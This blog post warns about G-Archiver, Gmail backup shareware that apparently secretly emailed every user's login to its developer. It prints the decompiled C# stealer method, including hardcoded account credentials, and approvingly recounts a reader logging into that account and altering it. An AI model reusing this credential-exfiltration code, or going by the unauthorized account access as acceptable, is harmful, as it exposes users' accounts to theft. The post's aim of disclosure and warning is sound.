Password Stealing Shareware a Wake-Up Call?

I haven't hidden the fact that I've been a victim of ID theft before. I've also had the good fortune to be one of the employees whose past IBM employee data was lost. This story, however, is a wake-up call: you shouldn't casually trust any shareware or freeware program - or even service.

Coding Horrors wrote Friday about an email they received from a reader named Dustin Brooks, which is truly a tale of horror:

I was looking for a way to back up my gmail account to a local drive. I've accumulated a mass of important information that I would rather not lose. During my search I came across G-Archiver, I figured what the heck I'll give it a try.

It didn't really have the functionality I was looking for, but being a programmer myself I used Reflector to take a peek at the source code. What I came across was quite shocking. John Terry, the apparent creator, hard coded his username and password to his gmail account in source code. All right, not the smartest thing in the world to do, but then I noticed that every time a user adds their account to the program to back up their data, it sends and email with their username and password to his personal email box! Having just entered my own information I became concerned.

I opened up a browser and logged in to gmail using his account information. It still worked.

Upon getting to the inbox I was greeted with 1,777 emails with account information for everyone who had ever used the software and right at the top was mine. I decided to go ahead and blast every email to the deleted folder and then empty it. I may have accidentally changed the password and security question to something I don't remember as well, whoops, my bad. I also contacted google to erase this account as I didn't see a way to delete it myself.

The evidence is in the SM.dll Mail class:

public static void CheckConnection(string a, string b)
{
try
{
MailMessage message = new MailMessage();
message.To.Add("JTerry79@gmail.com");
message.From = new MailAddress("JTerry79@gmail.com", "JTerry", Encoding.UTF8);
message.Subject = "Account";
message.SubjectEncoding = Encoding.UTF8;
message.Body = "Username: " + a;
message.Body = message.Body + "\r\nPassword: " + b;
message.BodyEncoding = Encoding.UTF8;
message.IsBodyHtml = false;
message.Priority = MailPriority.High;
SmtpClient client = new SmtpClient();
client.Credentials = new NetworkCredential("JTerry79@gmail.com", "bilal482");
client.Port = 0x24b;
client.Host = "smtp.gmail.com";
client.EnableSsl = true;
client.Send(message);
}
catch (Exception)
{
}
}

I see no reason for the programmer to have the email addresses and passwords of the users of this program sent to him. That's bad enough, but the program is also shareware, priced at $29.95, so he has the audacity to charge you for your info.

I have to applaud Brooks, but I think he should have gone further. I would have reported this to the authorities. Maybe he could have used G-Archiver to archive the guy's email as evidence!

It's also interesting that at least a few large download sites have been fooled into hosting this application. I emailed these two about the potential issue.

• Softpedia
• Download.com

In my search, I also found a site ironically purporting to have a crack for the program.

As I said, this incident should make you wary of giving your user info and passwords out for just any service. This is the first time I've heard of something like this, and it's going to affect the trust that users have for startups, freeware and shareware in the future - and that's a bad thing for all of us.